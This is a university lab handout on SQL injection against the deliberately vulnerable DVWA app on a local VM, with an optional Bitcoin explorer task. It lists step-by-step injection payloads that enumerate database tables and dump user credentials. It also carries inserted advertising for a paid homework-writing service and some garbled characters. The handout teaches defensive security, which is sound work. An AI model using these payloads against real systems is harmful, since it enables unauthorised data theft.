Week 11 Lab
1 Overview
Database Security and Blockchain
The learning objective of this lab is for students to get familiar with blockchain, and vulnerabilities of and attacks targeting Web applications and back-end database.
Copyright By PowCoder代写 加微信 powcoder
2 Lab Environment
In this lab we will exploit SQL injection vulnerabilities on an intentionally vulnerable web server using the cloud VM.
3 Lab Task: SQL Injection Attack
Open the Firefox web browser in the VM and type http://127.0.0.1/DVWA in the address bar. Please note that the url is case sensitive. This should open the login page. Use admin as username and password as password. Once logged in scroll down the page and find the DVWA Security on the left pane.
Click on the DVWA Security and within the opened page change the security level to low and then click Submit.
FIT2093 Week 11 Lab
On the left pane click on the SQL Injection.
1. Use the provided links to learn more about this type of attack.
2. Enter a single quote in the provided text box and submit. What is the effect? What do we learn from the output?
3. Enter ¡±1¡± (without the quotes) in the provided text box and submit. The code within the page is supposed to output the first and last name of a user based on the provided user ID. Who has the user ID=1?
4. We know that the text entered in this field is not properly sanitised. We also know that a SQL query condi- tioned on the provided ID will be sent to the SQL server. We need to modify this query so that the condition will always be true. Enter %’ or ‘0’=’0 in the field and submit. What is the result? Explain why the provided input has this effect.
5. Additional SQL commands can be added to this query to gain more information. Enter %’ or 0=0 union select null, version() # in the text box and submit. Explain the result. What is the purpose of the added SQL statement?
FIT2093 Week 11 Lab
6. Enter %’ or 0=0 union select null, user() # and submit. Explain the result.
7. In the above statement replace user() with database(). Explain the output.
8. Enter %’ and 1=0 union select null, table_name from information_schema.tables # and submit. Explain the statement and the result.
9. Enter %’ and 1=0 union select null, table_name from information_schema.tables where table_name like ‘user%’# and submit. Explain the statement and the result.
10. Enter %’ and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = ‘users’ # and submit. Explain the statement and the result.
11. Enter %’ and 1=0 union select null, concat(first_name,0x0a, last_name,0x0a,user,0x0a,password) from users # and submit. Explain the statement and the result.
Optional Task: Blockchain
Use the Bitcoin Explorer https://www.blockchain.com/explorer
1. What information can you get from the block information page?
2. Click on a specific address under the transaction list. What are the transactions related to that address?
程序代写 CS代考 加微信: powcoder QQ: 1823890830 Email: powcoder@163.com